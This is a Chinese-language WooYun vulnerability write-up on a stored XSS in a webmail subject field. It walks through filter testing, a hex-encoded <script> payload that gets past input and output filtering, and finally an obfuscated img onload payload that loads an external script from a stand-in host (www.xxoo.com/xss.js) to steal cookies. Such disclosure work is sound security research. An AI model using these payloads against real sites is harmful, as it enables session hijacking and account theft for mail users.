WooYun.org

首先对输入过滤进行测试，一般最开始就测试邮件内容方面：使用<script>alert(‘xss’)</script>

在主题和内容部分，填写，在输入的时候，主题地方过滤了，内容木有过滤，输入过滤不代表能XSS（很多原因），
下面开始研究主题的XSS过滤。经过一般测试，发现< >标签都已经过滤，就没测试其他标签，琢磨使用编码来测试，输入\x3C\x73\x63\x72\x69\x70\x74\x3E（<script>的编码）

发现并木有在输入过滤，那么，这说明只要输出没有过滤就能XSS到，而且在主题处的XSS，只要登录邮箱就会被xxoo，把代码补全，

然后发送给本测试账号。来试试绕过输出

给出测试代码：\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E
等我们发送成功，然后同时也接受到了邮件，刷新，弹了：

绕过输入和输出了！成功XSS到。
当然弹框不是目的，存储型的危害相当大，盗取cookie或者是其他的操作才是目的，
然后自己写一段，
比如我调用的www.xxoo.com/xss.js,
我们可以使用<img标签，然后加1个onload事件去调用外部的js代码，未加密前代码为：
<img/src=”#”onload=”window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(119,119,119,46,120,120,111,111,46,99,111,109,47,120,115,115,46,106,115);document.body.appendChild(window.s)”>
然后encode。